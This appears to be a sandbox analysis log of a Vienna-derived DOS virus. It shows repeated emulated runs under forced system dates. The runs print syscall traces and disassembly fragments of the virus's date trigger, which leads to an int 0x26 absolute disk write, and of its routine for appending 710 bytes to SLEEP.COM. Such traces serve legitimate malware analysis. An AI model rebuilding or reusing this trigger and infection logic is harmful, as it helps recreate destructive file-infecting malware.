Sample viewer

vx.netlux.org/Virus.DOS.Vienna-based


Syscalls:

Time | Syscall Op (INT 21h function number from AH, decimal) | Syscall Name
2018-12-17T22:43:20.341688549Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:43:20.343249716Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T22:43:20.344232704Z 26 PC: 12a8a | Set disk transfer address
2018-12-17T22:43:20.345260307Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-17T22:43:20.348313003Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-17T22:43:20.350471661Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
0x12ad0: add si, 0x31
0x12ad4: lodsb al, byte ptr [si]
0x12ad5: mov cx, 0x8000
0x12ad8: repne scasb al, byte ptr es:[di]
0x12ada: mov cx, 4
0x12add: lodsb al, byte ptr [si]
2018-12-17T22:43:20.352719679Z 78 PC: 12b51 | Find first file
2018-12-17T22:43:20.358942496Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T22:43:20.365676248Z 67 PC: 12ba2 | Get or set file attributes
2018-12-17T22:43:20.385123626Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:20.391993058Z 87 PC: 12bb9 | Get or set file date and time
2018-12-17T22:43:20.394393031Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-17T22:43:20.396488139Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:43:20.402629505Z 66 PC: 12bea | Move file pointer
2018-12-17T22:43:20.40429374Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-17T22:43:20.411964246Z 66 PC: 12c20 | Move file pointer
2018-12-17T22:43:20.412919306Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:43:20.417506657Z 87 PC: 12c44 | Get or set file date and time
2018-12-17T22:43:20.418852209Z 62 PC: 12c48 | Close file
2018-12-17T22:43:20.426270196Z 67 PC: 12c57 | Get or set file attributes
2018-12-17T22:43:20.439986721Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, decimal) | Syscall Name
2018-12-25T12:02:50.701056102Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:50.703079929Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:50.704038813Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:50.704983417Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:50.707959492Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:50.71396248Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:50.719380541Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:50.736006406Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:50.742565097Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:50.74382411Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:50.746323569Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:50.753139162Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:50.755941921Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:50.764848223Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:50.767015414Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:50.77333049Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:50.77464787Z 62 PC: 12c48 | Close file
2018-12-25T12:02:50.786564747Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:50.796458721Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, decimal) | Syscall Name
2018-12-25T12:02:50.785373127Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:50.787051869Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:50.788733689Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:50.789742492Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:50.792041756Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-25T12:02:50.793950697Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:50.797847656Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:50.801592214Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:50.818997632Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:50.826438339Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:50.827856966Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:50.830520124Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:50.837433919Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:50.838825705Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:50.848678708Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:50.850088179Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:50.857797687Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:50.860633087Z 62 PC: 12c48 | Close file
2018-12-25T12:02:50.869661342Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:50.880885087Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, decimal) | Syscall Name
2018-12-25T12:02:50.988829643Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:50.9908612Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:50.993030807Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:50.994301125Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:50.996866119Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.004422302Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.009665132Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.642133349Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.650301989Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.652128706Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.654753713Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.662822915Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.664435598Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.674397435Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.676390573Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.684076756Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.686076066Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.694911989Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.706429083Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, decimal) | Syscall Name
2018-12-25T12:02:51.01123979Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:51.013544907Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:51.015631402Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:51.017323116Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:51.020189931Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.028447042Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.032886268Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.642699631Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.652596017Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.653902078Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.655594519Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.660447302Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.661498532Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.667046172Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.668959453Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.676232336Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.677634714Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.68757828Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.698429951Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, decimal) | Syscall Name
2018-12-25T12:02:51.082169605Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:51.083748992Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:51.085035008Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:51.086004601Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:51.08853073Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.094408363Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.099704624Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.115962367Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.122453212Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.123630349Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.126035101Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.131965505Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.133872762Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.142108474Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.143443233Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.149890982Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.152605655Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.16024133Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.1700135Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, decimal) | Syscall Name
2018-12-25T12:02:51.387110599Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:51.389224405Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:51.390346535Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:51.391385128Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:51.394126284Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.401097161Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.407227276Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.644037461Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.652586876Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.654560586Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.657348658Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.666148875Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.667756204Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.67772387Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.680972562Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.68801116Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.689653197Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.698425457Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.705055363Z 26 PC: 12c64 | Set disk transfer address